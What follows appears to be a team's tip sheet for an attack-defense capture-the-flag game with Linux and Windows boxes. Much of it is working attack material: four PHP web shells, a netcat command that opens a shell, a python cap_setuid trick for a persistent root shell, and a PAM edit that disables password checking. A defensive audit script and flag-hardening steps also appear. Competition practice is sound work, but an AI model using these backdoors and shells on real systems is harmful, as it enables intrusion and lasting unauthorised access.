Team of 4 or 5

One Linux Box
One Windows Box

If there are root/admin passwords, change them immediately. Change any other passwords on the box as well, as long as they aren’t used by the scoring bot/service.

Defending 2-3 services on each box. I don’t remember all the services but there was ftp and a wikipedia (TikiWiki). I think there was another web-service as well.

FTP. Your boxes are the same as everyone else's. Get login details so you can remote into your opponents' boxes.

Key Point: Any login that works on your box works on other people's boxes. If you have a login to the TikiWiki admin, you have a login to THEIR TikiWiki.

WEB STUFF:
web shell: 

<?php echo exec($_GET["password"]);?>
<?php echo shell_exec($_GET["password"]);?>
<?php system($_GET["password"],$retval);?>
<?php passthru($_GET["password"]);?>

Use it like this:

http://target_ip/filename_with_this_phpline.php?password=nc -l -p 59741 -e /bin/sh

DEFENSE:
Change permissions on flag files to ONLY be readable.
Make your flag files immutable (unable to be changed)

chattr +i /path/to/flag/file

OFFENSE:
If you get on another person's box, here are some sneaky tips (that require root):

setcap CAP_SETUID=ep `which python`

^ after doing this, you can get a root shell at any time: python -c "import os;os.setuid(0);os.seteuid(0);os.system('/bin/bash')"

This sets the suid bit on a program, without having the suid bit set 😀

———————————

Look for lines like these in the /etc/pam.d/common-auth file:

auth [success=1 default=ignore] pam_unix.so nullok_secure
auth requisite pam_deny.so

Change it to this:

auth [success=1 default=1] pam_unix.so nullok_secure

This allows any username/password combination to work. You basically nullify password checking; all logins are allowed.
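Since every team runs the same box, the two root-level tricks above (the cap_setuid capability on python and the default=1 edit in common-auth) are exactly what you should be checking for on your own machine. Here is an added audit script (not from the original post) that flags both; it reads a saved copy of `getcap -r /` output and a copy of common-auth, and the paths in the comments are assumptions.

```shell
#!/bin/sh
# Added defensive check for the two persistence tricks described above.
#
# Check 1: look for cap_setuid grants in saved getcap output.
# Produce the input with:  getcap -r / 2>/dev/null > caps.txt   (assumed path)
# Prints every offending line; returns 1 if any were found, 0 otherwise.
find_setuid_caps() {
    capsfile="$1"
    # getcap prints "cap_setuid=ep" or "cap_setuid+ep" depending on version
    grep -i 'cap_setuid' "$capsfile" && return 1
    return 0
}

# Check 2: inspect a copy of /etc/pam.d/common-auth.
# Returns 1 if the pam_unix control field uses a numeric "default=N" jump
# (the default=1 edit above skips pam_deny.so on failure) or if the
# pam_deny.so requisite line is missing; returns 0 if both look normal.
audit_pam_common_auth() {
    pamfile="$1"
    status=0
    if grep -E '^auth[[:space:]]+\[.*default=[0-9]+.*\][[:space:]]+pam_unix\.so' "$pamfile" >/dev/null; then
        echo "SUSPICIOUS: pam_unix.so control field jumps on failure in $pamfile"
        status=1
    fi
    if ! grep -E '^auth[[:space:]]+requisite[[:space:]]+pam_deny\.so' "$pamfile" >/dev/null; then
        echo "SUSPICIOUS: pam_deny.so requisite line missing from $pamfile"
        status=1
    fi
    return $status
}

# Usage (assumed paths):
#   find_setuid_caps caps.txt
#   audit_pam_common_auth /etc/pam.d/common-auth
```

If the PAM check fires, restore the line to `[success=1 default=ignore]`; if the capability check fires, `setcap -r /path/to/binary` removes the grant.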

———————————

MYSQL (if it's there):

mysql -p   (connects as current user, you provide a password. Try without -p for passwordless login)
show databases;   (shows databases)
connect DB_NAME;
show tables;
select * from TABLE_NAME;   (this should get you started)
